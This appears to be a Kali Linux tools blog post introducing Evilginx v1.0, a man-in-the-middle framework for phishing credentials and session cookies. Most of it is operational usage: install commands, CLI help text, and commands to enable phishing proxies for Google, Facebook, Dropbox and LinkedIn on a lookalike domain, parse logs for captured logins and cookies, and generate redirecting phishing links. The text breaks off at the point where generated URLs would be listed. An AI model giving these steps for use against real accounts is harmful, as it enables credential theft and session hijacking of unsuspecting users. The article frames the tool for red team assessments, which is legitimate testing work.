Home Kali Linux Evilginx – MITM Attack Framework For Phishing Credentials & Session Cookies

Evilginx – MITM Attack Framework For Phishing Credentials & Session Cookies

Evilginx is a Man-in-the-middle attack framework used for phishing credentials and session cookies of any web service. It’s core runs on Nginx HTTP server, which utilizes proxy_pass and sub_filter to proxy and modify HTTP content, while intercepting traffic between client and server.

Installing Evilginx

Evilginx provides an installation script install.sh that takes care of installing the whole package on any Debian wheezy/jessie machine, in fire and forget manner.

Also Read Ghost Phisher – Wireless & Ethernet Attack Software Application

git clone https://github.com/kgretzky/evilginx
cd evilginx
chmod 700 install.sh


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 by @mrgretzky  |___/          v1.0

usage: evilginx.py [-h] {setup,parse,genurl} ...

positional arguments:
    setup               Configure Evilginx.
    parse               Parse log file(s).
    genurl              Generate phishing URL.

optional arguments:
  -h, --help            show this help message and exit


Enable or disable site configurations for use with Nginx server, using supplied Evilginx templates from sites directory.

usage: evilginx.py setup [-h] [-d DOMAIN] [-y]
                         (-l | --enable ENABLE | --disable DISABLE)

optional arguments:
  -h, --help            show this help message and exit
  -d DOMAIN, --domain DOMAIN
                        Your phishing domain.
  -y                    Answer all questions with 'Yes'.
  -l, --list            List available supported apps.
  --enable ENABLE       Enable following site by name.
  --disable DISABLE     Disable following site by name.

List available site configuration templates:

python evilginx.py setup -l

Listing available supported sites:
- dropbox (/root/evilginx/sites/dropbox/config)
subdomains: www

- google (/root/evilginx/sites/google/config)
subdomains: accounts, ssl

- facebook (/root/evilginx/sites/facebook/config)
subdomains: www, m

- linkedin (/root/evilginx/sites/linkedin/config)
subdomains: www

Enable google phishing site with preregistered phishing domain not-really-google.com:

python evilginx.py setup --enable google -d not-really-google.com

Disable facebook phishing site:

python evilginx.py setup --disable facebook


Parse Nginx logs to extract intercepted login credentials and session cookies. Logs, by default, are saved in logs directory, where evilginx.py script resides. This can be done automatically after you enable auto-parsing in the Setup phase.

usage: evilginx.py parse [-h] -s SITE [--debug]

optional arguments:
  -h, --help            show this help message and exit
  -s SITE, --site SITE  Name of site to parse logs for ('all' to parse logs
                        for all sites).
  --debug               Does not truncate log file after parsing.

Parse logs only for google site:

python evilginx.py parse -s google

Parse logs for all available sites:

python evilginx.py parse -s all

Generate URL

Generate phishing URLs that you can use in your Red Team Assessments.

usage: evilginx.py genurl [-h] -s SITE -r REDIRECT

optional arguments:
  -h, --help            show this help message and exit
  -s SITE, --site SITE  Name of site to generate link for.
  -r REDIRECT, --redirect REDIRECT
                        Redirect user to this URL after successful sign-in.
Generate google phishing URL that will redirect victim to rick’roll video on successful login:

python evilginx.py genurl -s google -r https://www.youtube.com/watch?v=dQw4w9WgXcQ

Generated following phishing URLs: